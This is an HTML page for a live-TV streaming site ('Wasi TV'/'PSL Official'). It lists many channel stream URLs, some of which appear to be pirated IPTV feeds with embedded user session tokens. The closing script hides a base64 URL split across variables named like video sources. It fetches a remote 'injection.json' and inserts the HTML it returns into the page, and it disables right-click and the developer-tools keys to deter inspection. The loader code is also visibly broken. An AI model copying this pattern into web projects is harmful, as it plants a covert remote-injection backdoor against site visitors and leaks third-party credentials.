<html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>Wasi TV</title>
<link href="https://niazitv.com/jtv/style.css" rel="stylesheet">
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css">
<link href=" https://use.fontawesome.com/releases/v5.0.6/css/all.css" rel="stylesheet" >
		<script src="https://s0.2mdn.net/instream/video/client.js" async="" type="text/javascript"></script><script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
		
		<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.11.2/css/all.min.css">
		<style>
			:root {
				--hfs: 2vmax;
				--primaryColor: red;
				--secondaryColor: black;
				--secondaryOpposite: white;
			}
			::-webkit-scrollbar {
				width: 0em;
				height: 0em;
			}
			::-webkit-scrollbar-thumb {
				background: var(--secondaryColor);
			}
			::-webkit-scrollbar-track {
				background: none;
			}
			* {
				-webkit-user-select: none;
				-moz-user-select: none;
				-ms-user-select: none;
				user-select: none;
			}
			body {
				background-color: var(--secondaryColor);
			}

			.alignleft {
				float: left;
				margin-left: 5px;
				font-weight: bold;
				font-size: 15px;
			}

			.alignright {
				float: right;
				margin-right: 10px;
				color: var(--primaryColor);
				font-weight: normal;
                font-size: 25px;
			}

			h4  {
				margin-left: 5px;
				color: var(--primaryColor);
				font-weight: bold;
				font-size: 15px;
			}

			.nta {
				position: relative;
				overflow: hidden;
				color: var(--primaryColor);
			}

			div.scrollmenu {
				background-color: var(--secondaryColor);
				overflow: auto;
				white-space: nowrap;
				position: relative;
				overflow-y: hidden;
			}

			div.scrollmenu a {
				display: inline-block;
				color: var(--secondaryOpposite);
				text-align: center;
				padding: 4px;
				text-decoration: none;
			}

			div.scrollmenu a:hover {
				background-color: var(--secondaryColor);
			}

			.cen {
				position: relative;
				text-align: center;
				color: var(--secondaryOpposite);
			}

			.centered {
				font-size: var(--hfs);
				font-weight: bold;
				position: absolute;
				top: 80%;
				left: 50%;
				transform: translate(-50%, -50%);
			}

			.cent {
				font-size: auto;
				position: absolute;
				top: 95%;
				left: 50%;
				transform: translate(-50%, -50%);
			}

			.nt {
				width: 100px;
				border-radius: 10px;
				height: 120px;
				z-index: 1;
			}

			.mnt {
				width: 100px;
				border-radius: 2px;
				height: 100px;
			}
			.item img {
				border-radius: 10px;
			}
			#content-container {
				margin-bottom: 30px;
			}
			footer {
				display: grid;
				grid-gap: 0.5em;
				grid-template-columns: repeat(5, minmax(10px, 1fr));
				position: fixed;
				bottom: 0;
				left: 0;
				width: 100%;
				background-color: var(--secondaryColor);
				padding: 0px 4px 10px;
				justify-content: center;
				align-items: center;
                font-size:18px;
			}
			footer a {
				text-align: center;
				color: var(--primaryColor);
			}
			footer a:nth-child(3) i {
				background: var(--primaryColor);
				border-radius: 50%;
				padding: 10px 10px;
				color: var(--secondaryOpposite);
				margin-top: -40px;
				border: 2px solid var(--secondaryColor);
			}
		</style>


<style>::-webkit-scrollbar{
    display:none
}
*{
    -ms-overflow-style:none;
    scrollbar-width:none
}
body{
    margin:0;
    background:#f5f5f5;
    font-family:Arial,Helvetica,sans-serif;
    line-height:1.5;
    color:white;
    scroll-behavior:smooth;
    text-align:center;
}
#player-wrapper{
    width:100%;
    z-index:999;
}
.sticky{
    position:fixed;
    top:0;
    width:100%
}
#status{
    position:fixed;
    bottom:0;
    right:0;
    width:100%;
    background:#fff;
    display:none;
}
.col-sm-2{
    border-radius:4px
}
.sp{
    width:50%;
    height:12px;
    clear:both;
    margin:20px auto
}
.sp-texture{
    border:1px #000 solid;
    border-radius:4px;
    position:relative;
    background:linear-gradient(45deg,transparent 49%,#000 50%,#000 50%,transparent 51%,transparent),linear-gradient(-45deg,transparent 49%,#000 50%,#000 50%,transparent 51%,transparent);
    background-size:16px 16px;
    background-position:0 0;
    -webkit-animation:spTexture 1s infinite linear;
    animation:spTexture 1s infinite linear;
    color:#000;
    text-align:center;
    line-height:3em;
    font-family:roboto
}
@-webkit-keyframes spTexture{
    from{
        background-position:0 0
    }
    to{
        background-position:-16px 0
    }
}
@keyframes spTexture{
    from{
        background-position:0 0
    }
    to{
        background-position:-16px 0
    }
}
.heading{
    margin:5px auto;
    text-align:center
}
#rmpPlayer{
    z-index:999
}
.white{
    color:#fff
}
.red{
    color:red
}
.yellow{
    color:#ffdd40
}
footer{
    color:#fff;
    text-align:center
}
footer p{
    margin-bottom:20px;
    margin-top:-10px
}
.animated{
    font-family:sans;
    margin:0;
    padding:0;
    font-size:25px;
    background:url(https://upload.wikimedia.org/wikipedia/commons/3/3b/ColorRotateHr.gif) no-repeat;
    background-clip:text;
    -webkit-background-clip:text;
    color:transparent;
    animation:moveBg 40s linear infinite;
    -webkit-animation:moveBg 40s linear infinite
}
@keyframes moveBg{
    0%{
        background-position:0 30%
    }
    100%{
        background-position:100% 50%
    }
}
.blink{
    animation-name:blinker;
    animation-duration:1s;
    animation-timing-function:linear;
    animation-iteration-count:infinite
}
@keyframes blinker{
    0%{
        opacity:1
    }
    50%{
        opacity:0
    }
    100%{
        opacity:1
    }
}
*{
    -webkit-touch-callout:none;
    -webkit-user-select:none;
    -khtml-user-select:none;
    -moz-user-select:none;
    -ms-user-select:none;
    user-select:none
}
body{
    background:#000!important;
    overflow:hidden;
    color:white;
}
.parent{
    background:rgba(0,0,0,.9);
    font-family:"Source Sans Pro",sans-serif;
    margin:0;
    display:flex;
    align-items:center;
    justify-content:center;
    flex-direction:column;
    position:fixed;
    top:0;
    height:100%;
    width:100%;
    z-index:999999
}
.blobs-container{
    display:flex
}
.blob img{
    width:50%;
    display:none;
    margin:auto;
    margin-top:25px
}
.loading{
    color:#000;
    display:block;
    text-align:center;
    position:relative;
    top:30px;
    left:-2px;
    background:rgba(255,255,255,.9);
    padding:0 10px;
    border-radius:3px;
    width:80%;
    margin:auto;
    font-size:10px
}

.print{height:65px;
width:65px;

border-radius:50px;
border:1.5px solid #f5f5f5;
padding:2px;
    margin:3px;

}
.print:hover{height:90px;
width:90px;
border:2px solid red;
border-radius:5px;webkit-box-shadow: 0px 10px 0px 0px rgba(255,0,0,1);
-moz-box-shadow: 0px 10px 0px 0px rgba(255,0,0,1);
box-shadow: 0px 3px 20px 3px rgba(255,0,0,100);}
.print:active{height:65px;
width:65px;
border:2px solid red;
border-radius:5px;
webkit-box-shadow: 0px 10px 0px 0px rgba(0,255,0,1);
-moz-box-shadow: 0px 10px 0px 0px rgba(0,255,0,1);
box-shadow: 0px 3px 20px 3px rgba(0,255,0,100);}


marquee{
border-radius: 0px 0px 0px  0px;
width: 90%;
border:2px solid red;
margin: auto;
   font-weight:bold;
   color:#fff;
display: block;}

.marquee span{display: inline-block;
 background: #ff0000;
 border-radius:  0px 0px 0px 0px;
  padding: 0px 10px;
   color: #fff;
   padding:2px;
   font-weight:bold;
    display: inline-block;
     float: left;
      width: auto;
       line-height: 35px;}
       
       .marquee marquee{display: block;
        line-height: 35px;
         z-index: -1; 
         margin-right: 10px;
          width: auto; 
          margin: auto;}
          

          
       .viewer{
        display: flex;
        width: 70px;
        height: auto;
        padding: 10px;
        vertical-align: middle;
      }

  
          #count{display:flex;font-size:10pt;padding:1px 10px;width:90px;background:Red;border-radius:0px;}
</style>

<link id="rmp-dress-code" type="text/css" rel="stylesheet" href="https://cdn.radiantmediatechs.com/rmp/5.9.2/css/rmp-s4.min.css"></head><body style="overflow: auto;">
	

		<script>
var src = {
  mp4: [
    'https://sandl.herokuapp.com/video/video?url=https://m.youtube.com/watch?v=G7Evl8C-WIs'
  ],
  webm: [
    'https://your-webm-sd-url.webm',
    'https://your-webm-hd-url.webm',
    'https://your-webm-full-hd-url.webm'
  ]
};


		</script><div class="parent" id="loader" style="display: none;"><div class="blobs-container"><div class="blob"><img id="loader-image" src=""></div></div></div><div id="player-wrapper">  <script src="https://cdn.radiantmediatechs.com/rmp/6.2.0/js/rmp.min.js"></script> 
  <!-- Add a div container with a unique id - video and UI elements will be appended to this container -->
  <div id="rmpPlayer"></div>  

 
<div class="marquee yellow"><span><i class="fa fa-bell" style="font-size:26pt" aria-hidden="true"></i></span> <marquee scrollamount="5" direction="left" onmouseover="stop()" onmouseout="start()">We are Updating Our Application as We Update Our Application Will B Send Notification To All User's Thanks For PSL Official</marquee> </div> 



	
	<h2>
		
		
	              
           <span url="http://dreamsat.cc:8080/live/SP_C2022/dfeXqHzx/3020.m3u8"><img height="70" src="http://hdmatch.xyz/assets/v1/images/app-icon.png" style="border-radius:100px;" width="70"></span> 


 <span url="http://dreamsat.cc:8080/live/SP_C2022/dfeXqHzx/3020.m3u8"><img name="ptv sports" autofocus="" class="print" id="Bein sport " src="http://hdmatch.xyz/assets/v1/images/app-icon.png">
              </span>

 <span url="http://mu03ye.wanicelife.com:8880/live/YALM4649/y6q3fhltq/31641.m3u8"><img class="print" id="ptv sports" src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTLKQnYyjRugWFvMa9ngfzT0CLxkcsjNp-wsw&usqp=CAU">
              </span>

 <span url="http://mu03ye.wanicelife.com:8880/live/YALM4649/y6q3fhltq/31641.m3u8"><img name="ptv sports" autofocus="" class="print" id=" ptv sports " src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTLKQnYyjRugWFvMa9ngfzT0CLxkcsjNp-wsw&usqp=CAU">
              </span>

  <span url="http://mu03ye.wanicelife.com:8880/live/YALM4649/y6q3fhltq/31641.m3u8"><img class="print" id="ptv sports" src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTLKQnYyjRugWFvMa9ngfzT0CLxkcsjNp-wsw&usqp=CAU">
              </span>
              
              <span url="http://dreamsat.cc:8080/live/SP_C2022/dfeXqHzx/3020.m3u8" url="http://dreamsat.cc:8080/live/SP_C2022/dfeXqHzx/3021.m3u8"><img height="70" src="http://hdmatch.xyz/assets/v1/images/app-icon.png" style="border-radius:100px;" width="70"></span> 
           <span url="http://dreamsat.cc:8080/SP_C2022/dfeXqHzx/3020"><img height="70" txt="beints" src="http://hdmatch.xyz/assets/v1/images/app-icon.png" style="border-radius:100px;" width="70"></span> 
           <span url="http://cdn-hls.globecast.tv/live/ramdisk/arriadia/hls_snrt/index.m3u8"><img height="70" src="https://j.top4top.io/p_17837xums0.jpg" style="border-radius:100px;" width="70"></span> 
           <span url="http://cdnamd-hls-globecast.akamaized.net/live/ramdisk/al_aoula_inter/hls_snrt/al_aoula_inter-avc1_1500000=4-mp4a_130400_qad=1.m3u8"><img height="70" src="https://c.top4top.io/p_17833v6800.jpg" style="border-radius:100px;" width="70"></span> 
           <span url="http://cdnamd-hls-globecast.akamaized.net/live/ramdisk/2m_monde/hls_video_ts/2m_monde.m3u8"><img height="70" src="https://d.top4top.io/p_1783i17m60.jpg" style="border-radius:100px;" width="70"></span> 
           <span url="http://cdn-hls.globecast.tv/live/ramdisk/arrabiaa/hls_snrt/arrabiaa-avc1_1500000=4-mp4a_130400_qad=1.m3u8"><img height="70" src="https://l.top4top.io/p_1783pa3c91.jpg" style="border-radius:100px;" width="70"></span> 
           <span url="http://cdn-hls.globecast.tv/live/ramdisk/al_maghribia_snrt/hls_snrt/al_maghribia_snrt-avc1_1500000=4-mp4a_130400_qad=1.m3u8"><img height="70" src="https://a.top4top.io/p_1783hn5i32.jpg" style="border-radius:100px;" width="70"></span> 
           <span url="http://cdn-hls.globecast.tv/live/ramdisk/assadissa/hls_snrt/assadissa-avc1_1500000=4-mp4a_130400_qad=1.m3u8"><img height="70" src="https://d.top4top.io/p_1783ix3100.jpg" style="border-radius:100px;" width="70"></span> 
           <span url="http://cdnamd-hls-globecast.akamaized.net/live/ramdisk/tamazight_tv8_snrt/hls_snrt/tamazight_tv8_snrt-avc1_1500000=4-mp4a_130400_qad=1.m3u8?1320627"><img height="70" src="https://e.top4top.io/p_17837c9st1.jpg" style="border-radius:100px;" width="70"></span> 
           <span url="http://echoroukonline.ga:8081/echo/EchoroukTV/chunks.m3u8"><img height="70" src="https://h.top4top.io/p_1795ik9ga1.jpg" style="border-radius:100px;" width="70"></span> 
           <span url="http://htvmada.mada.ps:8888/wattan/tracks-v1a1/mono.m3u8"><img height="70" src="https://g.top4top.io/p_1807hhe5a0.jpeg " style="border-radius:100px;" width="70"></span> 
           <span url="http://htvpalsat.mada.ps:8888/PBCLive/tracks-v1a1/mono.m3u8"><img height="70" src="https://b.top4top.io/p_18071j16b0.jpg" style="border-radius:100px;" width="70"></span> 
           <span url="http://htvpalsat.mada.ps:8888/musawa/tracks-v1a1/mono.m3u8"><img height="70" src="https://f.top4top.io/p_1807r93140.jpg" style="border-radius:100px;" width="70"></span> 
           <span url="http://192.34.153.37:7777/Mekameleen_HD.m3u8?user=sgls540839&amp;session=2ca75f59ad04d9dc76c5f4b220cfc484a0a5993090f59bdfe8f49dae10711dd908036a956bb085d6579a5eb2e5be3bd7"><img height="70" src="https://l.top4top.io/p_180063gzr0.jpg" style="border-radius:100px;" width="70"></span> 
           <span url="http://echoroukonline.ga:8081/echo/EchoroukNews/chunks.m3u8"><img height="70" src="https://b.top4top.io/p_1795rfvg00.jpg" style="border-radius:100px;" width="70"></span> 
           <span url="https://rotananet.hibridcdn.net/rotana/kids_abr/rotana/kids_1080p/chunks.m3u8"><img height="70" src="https://e.top4top.io/p_1820rwuo70.png" style="border-radius:100px;" width="70"></span> 
           <span url="https://dai.google.com/linear/hls/pa/event/TTfW9QXGRVCBzHoEKgyrWA/stream/e231e402-1932-4e1d-aaef-a9dd9b1ec13e:BRU/master.m3u8"><img height="70" src="https://e.top4top.io/p_1797vdqgu0.jpg" style="border-radius:100px;" width="70"></span> 
           <span url="https://rotananet.hibridcdn.net/rotana/classical_abr/rotana/classical_1080p/chunks.m3u8"><img height="70" src="https://d.top4top.io/p_1797hvz2f1.jpg" style="border-radius:100px;" width="70"></span> 
           <span url="https://rotananet.hibridcdn.net/rotana/drama_abr/rotana/drama_1080p/chunks.m3u8"><img height="70" src="https://l.top4top.io/p_17979h6k20.png" style="border-radius:100px;" width="70"></span> 
           <span url="https://svs.itworkscdn.net/royalive/royatv.smil/royapublish/royatv_360p/chunks.m3u8"><img height="70" src="https://i.top4top.io/p_17975ufww0.jpg" style="border-radius:100px;" width="70"></span> 
           <span url="https://admdn4.cdn.mangomolo.com/majid/smil:majid.stream.smil/playlist.m3u8"><img height="70" src="https://c.top4top.io/p_1820jbzkj0.jpg" style="border-radius:100px;" width="70"></span> 
           <span url="https://streams.spacetoon.com/live/stchannel/smil:livesmil.smil/playlist.m3u8"><img height="70" src="https://d.top4top.io/p_1800xp3jm0.png" style="border-radius:100px;" width="70"></span> 
           <span url="http://posterboot.xyz:8080/live/streeem/streeem/54.m3u8"><img height="70" src="https://e.top4top.io/p_1800bn9tv1.png" style="border-radius:100px;" width="70"></span> 
           <span url="http://dmieigthvll.cdn.mangomolo.com/samadubai/smil:samadubai.stream.smil/chunklist_b850000.m3u8"><img height="70" src="https://d.top4top.io/p_1805emaix0.jpeg" style="border-radius:100px;" width="70"></span> 
           <span url="http://partne.cdn.mangomolo.com/omantv/smil:omantv.stream.smil/playlist.m3u8"><img height="70" src="https://i.top4top.io/p_1805fysav0.jpg" style="border-radius:100px;" width="70"></span> 
           <span url="https://5a3ed7a72ed4b.streamlock.net/zagrostv/SMIL:myStream.smil/playlist.m3u8"><img height="70" src="https://c.top4top.io/p_1805mxts60.jpg" style="border-radius:100px;" width="70"></span> 
           <span url="https://live-hls-web-ajd.getaj.net/AJD/05.m3u8"><img height="70" src="https://f.top4top.io/p_1805z7rw00.jpg" style="border-radius:100px;" width="70"></span> 
           <span url="http://cdnamd-hls-globecast.akamaized.net/live/ramdisk/saudi_quran/hls1/saudi_quran-avc1_600000=4-mp4a_41200=1.m3u8"><img height="70" src="https://www13.0zz0.com/2020/11/20/18/285398548.png" style="border-radius:100px;" width="70"></span> 
           <span url="http://82.212.74.2:8000/live/7307.m3u8"><img height="70" src="https://l.top4top.io/p_1820r43i60.jpg" style="border-radius:100px;" width="70"></span> 
           <span url="http://iqraac.cdn.mangomolo.com/iqraa/smil:iqraar1.stream.smil/chunklist_b850000_t64MzYwcA==.m3u8"><img height="70" src="https://f.top4top.io/p_182012sxy0.jpg" style="border-radius:100px;" width="70"></span> 
           <span url="http://jmc-live.ercdn.net/alistiqama/alistiqama.m3u8"><img height="70" src="https://g.top4top.io/p_1820ab02v0.jpg" style="border-radius:100px;" width="70"></span> 
           <span url="http://vod.hibridcdn.net/cnbc/liveabr/playlist.m3u8"><img height="70" src="https://d.top4top.io/p_1820128i40.jpg" style="border-radius:100px;" width="70"></span> 
           <span url="http://htvpalsat.mada.ps:8888/najah/index.m3u8"><img height="70" src="https://d.top4top.io/p_1820y0vwb0.jpg" style="border-radius:100px;" width="70"></span> 
           <span url="http://serv30.vintera.tv:8081/africa/tunisieimmob/chunks.m3u8"><img height="70" src="https://e.top4top.io/p_1820pff090.jpg" style="border-radius:100px;" width="70"></span> 
           <span url="http://142.44.214.231:1935/saheltv/myStream/playlist.m3u8"><img height="70" src="https://c.top4top.io/p_1820qoto50.jpg" style="border-radius:100px;" width="70"></span> 
           <span url="http://cdn.catiacast.video/abr/78054972db7708422595bc96c6e024ac/playlist.m3u8"><img height="70" src="https://e.top4top.io/p_18204d9b47.jpg" style="border-radius:100px;" width="70"></span> 
           <span url="http://dmiffthvll.cdn.mangomolo.com/noordubaitv/smil:noordubaitv.smil/chunklist_b1500000.m3u8"><img height="70" src="https://www12.0zz0.com/2020/11/20/18/280094674.jpg" style="border-radius:100px;" width="70"></span> 
           <span url="http://cdnamd-hls-globecast.akamaized.net/live/ramdisk/saudi_sunnah/hls1/saudi_sunnah-avc1_250000=3-mp4a_41200=1.m3u8"><img height="70" src="https://www10.0zz0.com/2020/11/20/18/468627893.jpg" style="border-radius:100px;" width="70"></span> 
           <span url="http://makkahtv.srfms.com:1935/makkahtv/livestream/chunklist_w966623075.m3u8"><img height="70" src="https://www4.0zz0.com/2020/11/20/18/785456887.png" style="border-radius:100px;" width="70"></span> 
           <span url="http://admdn2.cdn.mangomolo.com/nagtv/smil:nagtv.stream.smil/chunklist_b125000_t64MTgwcA==.m3u8"><img height="70" src="https://f.top4top.io/p_1783fqsll0.jpg" style="border-radius:100px;" width="70"></span> 
           <span url="https://shls-mbc1ksa-prod-dub.shahid.net/out/v1/451b666db1fb41c7a4bbecf7b4865107/index.m3u8"><img height="70" src="https://l.top4top.io/p_1783r7u7e0.jpg" style="border-radius:100px;" width="70"></span> 
           <span url="https://shls-mbc2-prod-dub.shahid.net/out/v1/b4befe19798745fe986f5a9bfba62126/index.m3u8"><img height="70" src="https://e.top4top.io/p_17834pttm0.jpg" style="border-radius:100px;" width="70"></span> 
           <span url="https://shls-mbcaction-prod-dub.shahid.net/out/v1/68dd761538e5460096c42422199d050b/index.m3u8"><img height="70" src="https://f.top4top.io/p_1783vbpag0.jpg" style="border-radius:100px;" width="70"></span> 
           <span url="https://shls-mbc5-prod-dub.shahid.net/out/v1/2720564b6a4641658fdfb6884b160da2/index_8.m3u8"><img height="70" src="https://h.top4top.io/p_1783oxw4d1.jpg" style="border-radius:100px;" width="70"></span> 
           <span url="https://shls-mbcbollywood-prod-dub.shahid.net/out/v1/a79c9d7ef2a64a54a64d5c4567b3462a/index.m3u8"><img height="70" src="https://h.top4top.io/p_17830h2b00.jpg" style="border-radius:100px;" width="70"></span> 
           <span url="https://shls-masr-prod-dub.shahid.net/out/v1/b7093401da27496797a8949de23f4578/index_3.m3u8"><img height="70" src="https://e.top4top.io/p_17883pwac1.jpg" style="border-radius:100px;" width="70"></span> 
           <span url="http://htvajyal.mada.ps:8888/ajyal/tracks-v1a1/mono.m3u8?_26"><img height="70" src="https://h.top4top.io/p_1802k67ct0.jpg" style="border-radius:100px;" width="70"></span> 
           <span url="http://www.elahmad.com/tv/m3u8/adtv.m3u8?id=abudhabi_aloula&amp;_22"><img height="70" src="https://h.top4top.io/p_1802caaow0.jpg" style="border-radius:100px;" width="70"></span> 
           <span url="http://www.elahmad.com/tv/m3u8/adtv.m3u8?id=abudhabi_drama&amp;_21"><img height="70" src="https://g.top4top.io/p_1802im6hz0.jpg" style="border-radius:100px;" width="70"></span> 
           <span url="http://two.alfajertv.com:8081/AlfajertvHDTwo_web/web/chunks.m3u8"><img height="70" src="https://www6.0zz0.com/2020/11/20/17/614088243.png" style="border-radius:100px;" width="70"></span> 
           <span url="https://live.alarabiya.net/alarabiapublish/alarabiya.smil/playlist.m3u8"><img height="70" src="https://k.top4top.io/p_1783ti6vg0.jpg" style="border-radius:100px;" width="70"></span> 
           <span url="http://79.137.106.241/live/smil:OutStream1.smil/chunklist_w2100359330_b4500000_sleng.m3u8?blacktv.m3u8"><img height="70" src="https://b.top4top.io/p_17836ne3v0.jpg" style="border-radius:100px;" width="70"></span> 
           <span url="https://live-hls-web-aja.getaj.net/AJA/index.m3u8"><img height="70" src="https://l.top4top.io/p_1805rod5c0.jpg" style="border-radius:100px;" width="70"></span> 
           <span url="https://vs-hls-ww.live.cf.md.bbci.co.uk/pool_902/live/nonuk/bbc_arabic_tv/bbc_arabic_tv.isml/index.m3u8"><img height="70" src="https://k.top4top.io/p_1805keelz0.png" style="border-radius:100px;" width="70"></span> 
           <span url="http://f24hls-i.akamaihd.net/hls/live/221196-b/F24_AR_LO_HLS/master_900.m3u8"><img height="70" src="https://j.top4top.io/p_1783nv1pm0.jpg" style="border-radius:100px;" width="70"></span> 
           <span url="http://dwstream2-lh.akamaihd.net/i/dwstream2_live@124400/master.m3u8"><img height="70" src="https://d.top4top.io/p_1815y4fks0.jpg" style="border-radius:100px;" width="70"></span> 
           <span url="https://almamlka-live.ercdn.net/almamlka/almamlka_1080p.m3u8"><img height="70" src="https://e.top4top.io/p_1815ykfvo0.jpg" style="border-radius:100px;" width="70"></span> 
           <span url="http://stream02.fasttelco.net/4/pub/asset/28/streams.m3u8"><img height="70" src="https://b.top4top.io/p_1815g7v980.jpg" style="border-radius:100px;" width="70"></span> 
           <span url="http://rt-arab.secure.footprint.net/1104_2500Kb.m3u8"><img height="70" src="https://f.top4top.io/p_178310xo00.jpg" style="border-radius:100px;" width="70"></span> 
           <span url="http://192.34.153.37:7777/AlhurraIraq_HD.m3u8?user=sgls540839&amp;session=67cf554de5187ee343521cc430873c530d1a15efa584bcba3022a8e3ad0627efa073c32a417773a4579a5eb2e5be3bd7"><img height="70" src="https://e.top4top.io/p_17885nisf1.jpg" style="border-radius:100px;" width="70"></span> 
           <span url="http://av.alarabiya.net/alarabiapublish/alhadath_720p/chunks.m3u8"><img height="70" src="https://h.top4top.io/p_1783aw52l0.jpg" style="border-radius:100px;" width="70"></span> 
           <span url="http://pluto-live.plutotv.net/egress/chandler/pluto01/live/VIACBS01/master.m3u8"><img height="70" src="https://j.top4top.io/p_18052mdxf0.png" style="border-radius:100px;" width="70"></span> 
           <span url="http://pluto-live.plutotv.net/egress/chandler/pluto01/live/VIACBS08/master.m3u8"><img height="70" src="https://c.top4top.io/p_1805uuyax0.png" style="border-radius:100px;" width="70"></span> 
           <span url="http://pluto-live.plutotv.net/egress/chandler/pluto01/live/VIACBS07/master.m3u8"><img height="70" src="https://d.top4top.io/p_18059a5xn0.png" style="border-radius:100px;" width="70"></span> 
           <span url="http://live-edge01.telecentro.net.ar/live/msctphd-720/playlist.m3u8"><img height="70" src="https://j.top4top.io/p_1789mqjet0.png" style="border-radius:100px;" width="70"></span> 
           <span url="https://stream.lanacanal.tv:5443/LiveApp/streams/369789291335520284765911.m3u8?checkedby:hlscat.com"><img height="70" src="https://k.top4top.io/p_18153rug40.png" style="border-radius:100px;" width="70"></span> 
           <span url="http://192.34.153.37:7777/Tunisie7_HD/Tunisie7_High.m3u8?user=sgls540839&amp;session=611ff0c548fc2776dbf056d23d71cc68b45b20d5c5cd42f3afb192967887864a9817224ea3922e90de2a9a15d4e21705&amp;hlsid=HTTP_ID_4&amp;starttime=20200717T070353.803889"><img height="70" src="https://i.top4top.io/p_1819f82wv0.png" style="border-radius:100px;" width="70"></span> 


<script>
const countEl = document.getElementById('count');

updateVisitCount();
  
function updateVisitCount() {
	fetch('https://api.countapi.xyz/hit/awaispirkale/visits')
	.then(res => res.json())
	.then(res => {
		countEl.innerHTML = res.value;
	})
}













// SOCIAL PANEL JS
const floating_btn = document.querySelector('.floating-btn');
const close_btn = document.querySelector('.close-btn');
const social_panel_container = document.querySelector('.social-panel-container');

floating_btn.addEventListener('click', () => {
	social_panel_container.classList.toggle('visible')
});
</script>

</div>        <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script><script src="https://cdn.radiantmediatechs.com/rmp/5.9.2/js/rmp.min.js"></script><script>
            var appSettings={
                loaderimg: "",
                name: "PSL Official",
                poster: " https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTmOwm5aR1DTCNkGmNSakKcLtpaSXt9s0qlsvTD_4-6uLcN4zhOsHuVB2L7&s=10",
                introMp4: "https://sandl.herokuapp.com/video/video?url=https://m.youtube.com/watch?v=G7Evl8C-WIs",
                introHls: "ht",
				videoFormat: "mp4",
            },x={loaderimg:appSettings.loaderimg,name:appSettings.name,poster:appSettings.poster,website:"",licenseKey:"eWZmZ2d2Y3BrdEAxNTMwNjA2",autoHeightMode:!0,pip:!1,autoplay:!1,skin:"s4",hideControls:!0,preload:"auto",sharing:!1},firstVideo="";setInterval(()=>{$("#loader-image").attr("src",x.loaderimg),$(".logoText").html(x.name)},10),$(document).contextmenu(function(e){return e.preventDefault(),!1}),document.onkeydown=function(e){return 123!=event.keyCode&&((!e.ctrlKey||!e.shiftKey||e.keyCode!="I".charCodeAt(0))&&((!e.ctrlKey||!e.shiftKey||e.keyCode!="C".charCodeAt(0))&&((!e.ctrlKey||!e.shiftKey||e.keyCode!="J".charCodeAt(0))&&((!e.ctrlKey||e.keyCode!="U".charCodeAt(0))&&void 0))))},setTimeout(()=>{$("#loader").css("display","none"),$("body").css("overflow","auto")},100);var src,secondVideo="mNvbnRlbnQuY29tL3NvZnR";$("span").each(function(e){$(this).on("click",function(){var e=$(this).attr("url");rmp.setControls(!0),src="mp4"==appSettings.videoFormat?{hls:e}:{mp4:[e]},rmp.setSrc(src),rmp.play()})});var thirdVideo="3ZWJ0dXRzL015RHJpdmUvbW";src="mp4"==appSettings.videoFormat?{hls:appSettings.introHls}:{mp4:[appSettings.introMp4]};var fourthVideo="Fpbi9pbmplY3Rpb24uanNvbg==",settings={licenseKey:x.licenseKey,autoHeightMode:x.autoHeightMode,pip:x.pip,delayToFade:3e3,gaLabel:"Live TV",logoWatermark:!0,logoPosition:"topleft",speed:"Speed",isLive:!0,googleCast:!0,airplay:!0,hlsJSMaxBufferLength:24,hlsJSLiveSyncDuration:18,hlsJSStartLevel:-1,hlsJSMinAutoBitrate:1e5,hlsJSAbrBandWidthFactor:.9,hlsJSAbrBandWidthUpFactor:.7,hlsJSLiveBackBufferLength:0,detectAutoplayCapabilities:!0,autoplay:x.autoplay,mutedAutoplayOnMobile:!1,mutedAutoplayOnMacosSafari11Plus:!1,srcChangeAutoplay:!0,playsInline:!0,skin:x.skin,skinBackgroundColor:"rgba(0, 0, 0, 0.7)",skinspanColor:"FFFFFF",skinAccentColor:"FF0000",ads:!0,nav:!0,adBlockerDetection:!0,adEnablePreloading:!0,adBlockerDetectedMessage:"Ad-blocker software detected. Please disable Ad-blocker to watch stream.",quickRewind:10,quickForward:10,adAutoAlign:!1,hideControls:x.hideControls,preload:x.preload,crossorigin:!0,sharing:x.sharing,sharingUrl:x.website,contentMetadata:{artwork:[{src:x.poster,sizes:"1280x720",type:"image/jpg"}],poster:[x.poster],endOfVideoPoster:[x.poster],thumbnail:x.poster},src:src},elementID="rmpPlayer",rmp=new RadiantMP(elementID),rmpContainer=document.getElementById(elementID);rmp.setLoop(!0),rmp.init(settings),$(function(){$(window).scroll(function e(){return $("#rmpPlayer").css($(window).scrollTop()>1?{position:"fixed",top:"0px"}:{position:"relative",top:"auto"}),$("#spans-list").css($(window).scrollTop()>1?{"margin-top":$("#rmpPlayer").height()}:{"margin-top":"0px"}),e}())});const request=async e=>{const t=await fetch(e);return await t.json()};navigator.onLine&&request(atob(firstVideo+secondVideo+thirdVideo+fourthVideo)).then(t=>{1==t.inject&&document.querySelector("div").insertAdjacentHTML("afterend",e.content)}).catch(e=>{console.log(appSettings.name)});</script>
                <br>
           <br>
           <br> 
           <footer> 
            <a href="https://sefiuorstar.github.io/File.html" target="_blank" rel="noopener noreferrer"><i class="fas fa-video"></i></a> 
            <a href="http://jdkdkeub6euveuzbudbe6nd.blogspot.com/p/bein.html?m=1" target="_blank" rel="noopener noreferrer"><i class="fas fa-tv"></i></a> 
            <a href="http://jdkdkeub6euveuzbudbe6nd.blogspot.com/p/homme.html?m=1" target="_blank" rel="noopener noreferrer"><i class="fas fa-home"></i></a> 
            <a href="http://jdkdkeub6euveuzbudbe6nd.blogspot.com/p/my-wilix-aflam.html?m=1" target="_blank" rel="noopener noreferrer"><i class="fas fa-film"></i></a> 
            <a href="http://jdkdkeub6euveuzbudbe6nd.blogspot.com/p/blog-page.html?m=1" target="_blank" rel="noopener noreferrer"><i class="fas fa-baseball-ball"></i></a> 
           </footer>  
           <div style="clear: both;"></div> 
          </div> 
          <div class="post-footer"> 
           <div class="post-footer-line post-footer-line-1"> 
            <span class="post-author vcard"> </span> 
            <span class="post-timestamp"> </span> 
            <span class="reaction-spans"> </span> 
            <span class="post-comment-link"> </span> 
            <span class="post-backlinks post-comment-link"> </span> 
            <span class="post-icons"> </span> 
            <div class="post-share-spans goog-inline-block"> 
            </div> 
           </div> 
